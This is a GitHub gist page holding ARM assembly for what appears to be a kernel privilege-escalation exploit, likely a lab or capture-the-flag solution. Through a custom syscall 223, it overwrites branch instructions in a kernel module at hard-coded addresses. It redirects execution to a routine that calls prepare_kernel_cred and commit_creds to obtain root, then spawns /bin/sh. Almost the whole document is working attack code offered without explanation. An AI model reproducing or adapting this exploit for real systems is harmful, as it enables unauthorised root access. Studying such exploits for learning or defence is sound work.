Skip to content

Instantly share code, notes, and snippets.

@HopHouse
Last active July 31, 2018 13:02
Show Gist options
  • Save HopHouse/04182707d82b569f963958f58f70dbfb to your computer and use it in GitHub Desktop.
Save HopHouse/04182707d82b569f963958f58f70dbfb to your computer and use it in GitHub Desktop.
SYSCALL ARM
.data
sh:
.asciz "//bin/sh"
result:
.word 0x00000000
.text
.global _start
/*
syscall(223, a, o, b, &r);
*/
_start:
/*
* Write jump to
*/
ldr r0, =0xea000000
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001bc /* location of + branch operand in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
ldr r0, =0x00000000
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c0 /* location of + branch operand plus 4 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
ldr r0, =0xe51ff004
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c4 /* location of + branch operand plus 8 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
/*
* Adress of the jump
*/
ldr r0, =elevate
ldr r1, =124 /* operand | */
ldr r2, =0x00000000 /* load the value 0x00000000 into R2 */
ldr r3, =0x7f0001c8 /* location of + branch operand plus 12 in module code */
mov r7, #223 /* syscall 223 -> calc */
svc #0
/*
* Read our elevate function and jump to it
*/
ldr r0, =8
ldr r1, =43 /* operand + */
ldr r2, =8
ldr r3, addr_of_result
mov r7, #223 /* syscall 223 -> calc */
svc #0
/*
* We have the root uid, so let's open a shell
*/
b shell
_exit:
mov r7, #1
svc #0
/*
* Get root uid
*/
elevate:
mov r0, #0
bl 0x80042464 /* prepare_kernel_cred */
bl 0x80042148 /* commit_creds */
bx lr
/*
* Open a shell
*/
shell:
ldr r0, =sh
sub r2, r2, r2
push {r2}
push {r0}
mov r1, sp /* r0 */
mov r7, #0xb
svc #0
addr_of_sh: .word sh
addr_of_result: .word result
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment